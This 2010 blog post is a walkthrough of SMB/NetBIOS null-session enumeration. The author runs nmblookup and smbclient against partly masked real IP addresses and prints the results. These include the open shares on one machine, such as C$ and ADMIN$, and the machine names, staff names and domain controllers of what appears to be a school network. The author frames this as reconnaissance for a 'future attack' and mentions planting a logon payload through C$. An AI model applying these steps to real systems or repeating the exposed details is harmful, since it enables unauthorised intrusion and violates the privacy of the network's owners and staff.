Tuesday, November 2, 2010

Remote shares



I came across this googling for exploits and It's really good for Recon. It uses port 139. So you need to find the Netbios name of the target computer, Microsoft makes this very easy. Once you find a target with 139 open issue the following command.

$nmblookup -A 12.***.58.154

The -A switch signifys a remote host. You will get some out put among the lines of.

Looking up status of 12.***.58.154
BROOKS <00> - M
ARROWSIGN <00> - M
BROOKS <20> - M
ARROWSIGN <1e> - M

MAC Address = 00-C0-A8-83-19-5D

So now we have a Netbios name "BROOKS" So to follow this up we are going to do the following command.

$smbclient -LBROOKS -I 12.***.58.154
Password:
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
SharedDocs Disk
print$ Disk Printer Drivers
ADMIN$ Disk Remote Admin
C$ Disk Default share
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------

I just hit return for the password and it shows a list of shares on that machine, c$ is my favorite share thats why I posted this example you can have access to the whole C:\ Drive with the c$ share you can set a payload to startup on logon etc..

Like I said before I just use this technique for information gathering for a future attach. I'll show you another example of some information you can get from this.

$ smbclient -LWEBSERVER -I 12.***.54.11
Password:
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------
ARAMIREZ
BUFFY Buffy Computer
BUSINESSSERVER
CHOFFMAN2
CHOFFMANN Cindy Hoffmann
CPELL
CSANTOYO
DESTINEYELELAB1
DESTINEYELEMLAB
DMUNOZ
ELEMPRINCIPAL IBM 2003_25
ELEMRECEP IBM2003_#29
ELEM_LIBRARY
EMATA
FAMNET
FESERVER
IPORTILLO
KIMPELL2 Dianne Kimpell
LMIRANDA
LORETTO2
LORETTO2A
MATA
NNIETO Teacher Computer
PHERRERA2 Patty Herrera
POLIVAS Patso Olivas
PRYHERD Teacher Computer
PS-55DAE6
RECORDS
RENRIQUEZ
SASI
SPACE
SVR-APP02
SVR-PDC
TEC2
WEBSERVER

Workgroup Master
--------- -------
101 TEACHER101
LORETTO SVR-PDC
WORKGROUP SPAREIBM

This tells you pretty much all the computers on the network, It tells you the domain and other trusted domains and It can also tell you the DC or GC server, very useful information gathering, it's essentially a map of someones LAN.

Enjoy
-Sumit-

No comments: